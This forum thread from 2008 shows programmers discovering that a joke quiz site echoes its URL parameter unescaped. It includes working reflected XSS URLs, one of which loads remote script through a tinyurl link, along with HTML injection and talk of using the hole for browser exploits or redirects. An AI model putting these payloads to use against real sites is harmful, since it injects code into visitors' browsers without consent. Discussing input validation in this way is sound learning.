How much are you worth?

Aziz · **Posted:** Wed Jul 30, 2008 11:59 am

I am about $260k. Check it out:

http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=263090

It's been the hit on IRC lately...

Dan · **Posted:** Wed Jul 30, 2008 12:01 pm

I am worth:
http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=%3Cscript%20src=%22http://tinyurl.com/5a785n%22%3E

Spoiler:

XSS is bad for your cookies.
Do you part in perventing rick role attacks, parse your input!

DemonWasp · **Posted:** Wed Jul 30, 2008 1:33 pm

@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.

I'm apparently worth squat: http://www.howmuchisyoursoulworth.com/results.html?earned_points=71605

(You can rip out the &radiog##=on nonsense and it doesn't have any effect)

Tony · **Posted:** Wed Jul 30, 2008 3:03 pm

Page source tells me the max I can be worth is

Quote:

DemonWasp · **Posted:** Wed Jul 30, 2008 3:20 pm

That only applies as long as you don't have Firebug, though, Tony...you can modify the value of hidden inputs (or show them, etc) with the flick of a button.

I sense someone about to post a screen cap of them being worth a million soul bucks.

Aziz · **Posted:** Wed Jul 30, 2008 3:27 pm

That input has nothing to do with it, though:

http://www.howmuchisyoursoulworth.com/results.html?earned_points=999999999999999999

Tony · **Posted:** Wed Jul 30, 2008 3:29 pm

Just a million?

http://www.howmuchisyoursoulworth.com/results.html?earned_points=%3Cblink%3EGoogol%3C/blink%3E

Don't even need Firebug to inject arbitrary HTML into the page.

DemonWasp · **Posted:** Wed Jul 30, 2008 3:36 pm

Ah, my bad. I thought the max-value hidden input was on the final page, but clearly not. It clearly doesn't even make an attempt to make sure you entered something valid - strings instead of ints? Come on!

It's great when pages have no validation.

Tony · **Posted:** Wed Jul 30, 2008 5:16 pm

Not just strings, but full out HTML. The "number" is rendered by something alone the lines of

code:

Meaning one could inject their own javascript into the page and essentially make that page do whatever they wanted. Which is exactly what Dan has done.

LaZ3R · **Posted:** Wed Jul 30, 2008 6:26 pm

edit: Woops... posted really long link and ruined the page horizontally ... my bad Very Happy

Dan · **Posted:** Wed Jul 30, 2008 9:11 pm

DemonWasp @ 30th July 2008, 1:33 pm wrote:

@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.

Yes and no, althought this page it's self does not have any valuable cookies to steal i could still inject an expolite for old versions of IE and take out a few IE 6 users or just redirect to a shock site and piss people off Wink

Using javascript you coudl also change any content on the page to give peoleop a false idea of what the page aucatly says. And if you are realy smart you might be able to make it make the client atack another site.

	Computer Science Canada Programming C, C++, Java, PHP, Ruby, Turing, VB Username: Password: Register
Wiki Blog Search Turing Chat Room Members